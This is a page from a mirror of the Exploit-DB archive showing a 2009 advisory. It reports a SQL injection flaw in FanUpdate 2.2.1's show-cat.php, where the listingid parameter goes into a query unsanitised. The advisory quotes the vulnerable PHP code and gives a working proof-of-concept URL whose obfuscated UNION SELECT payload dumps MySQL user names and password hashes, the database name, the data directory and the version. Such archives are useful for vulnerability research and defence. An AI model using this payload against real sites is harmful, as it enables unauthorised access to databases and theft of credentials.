bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/9719.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
889 B
Text
Raw Blame History

Author : (In)Security Romania
Website : https://insecurity.ro
Vulnerable script : FanUpdate 2.2.1
- Explanation
See show-cat.php file
-----------------------------------------------------------------------------------------------
if (!isset($listingid)) { exit; }
require_once('blog-config.php');
require_once('functions.php');
$fu =& FanUpdate::instance();
$fu->addOptFromDb();
$query = "SELECT * FROM ".$fu->getOpt('catoptions_table')." WHERE cat_id=$listingid LIMIT 1";
-----------------------------------------------------------------------------------------------
listingid variable not checked,we can inject our maliciouse SQL code.
- PoC
http://website/script/show-cat.php?listingid=nuLL/*pwned*/uNiOn+aLL+seLeCt+0,0,coNcAt_ws(0x3a,user,0x3a,password),coNcAt_ws(0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,version()),0,0+frOm+mysql.user--
# milw0rm.com [2009-09-18]
Reference in a new issue View git blame Copy permalink